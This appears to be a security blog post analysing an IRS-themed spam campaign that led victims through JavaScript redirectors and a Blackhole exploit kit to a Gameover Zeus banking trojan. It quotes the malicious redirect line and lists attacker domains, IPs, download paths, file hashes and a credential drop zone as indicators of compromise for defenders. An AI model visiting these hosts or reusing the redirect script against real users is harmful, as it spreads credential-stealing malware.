IRS themed spam continue dropping Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://annebickmoreswimming.co[.]uk/SsXbaqXv/index.htmlIRS notification of your tax appeal status
The text ‘Online Tax Appeal’ contains a hyperlink to a URL as shown above.  This page contains no content but only 5 JS:
pancarga[.]com /a5861cqc/js.js
suhutgundem[.]com /VLj9KNR8/js.js
paypal.socialo[.]pl /q9QQjLxa/js.js
personalart[.]pl /93b7jQCc/js.js
m.slevako[.]cz /w4eyfSFP/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 207.210.65.109:

document.location=’hxxp://178.77.99[.]145:8080 /showthread.php?t=d44175c6da768b70 ‘;

It downloadeds Gameover Zeus (installer) from the following location:

178.77.99.145:8080 /q.php?f=e0c3a&e=2

File: info.exe
MD5:c4df59ee070a33e07bbff66c0d46b421
Size: 2,74,383 bytes

This Gameover variant is detected by 3 of 43 AV vendors on VirusTotal.com. It then installs Zeus in %APPDATA% which had following properties:

File: eluqf.exe
MD5: cc6d35de55dee429dc801535b8104caa
Size: 2,73,944 bytes
Other: This file is digitally signed by ‘aPgdobQNbLOM’
Company Name: qwetr Corporation
File Description: qwetr Magnifier
File Version: 5.00.2151.1
Internal Name: MAGNIFIER
Legal Copyright: Copyright (C) qwetr Corp. 1981-1999
Original Filename: MAGNIFY.EXE
Product Name: qwetr(R) Windows (R) 2000 Operating System
Timestamp: 2011:02:03 19:50:12+01:00

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com.
The Gameover variant had a bot id of “ppcz13″ cid of “3004” and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: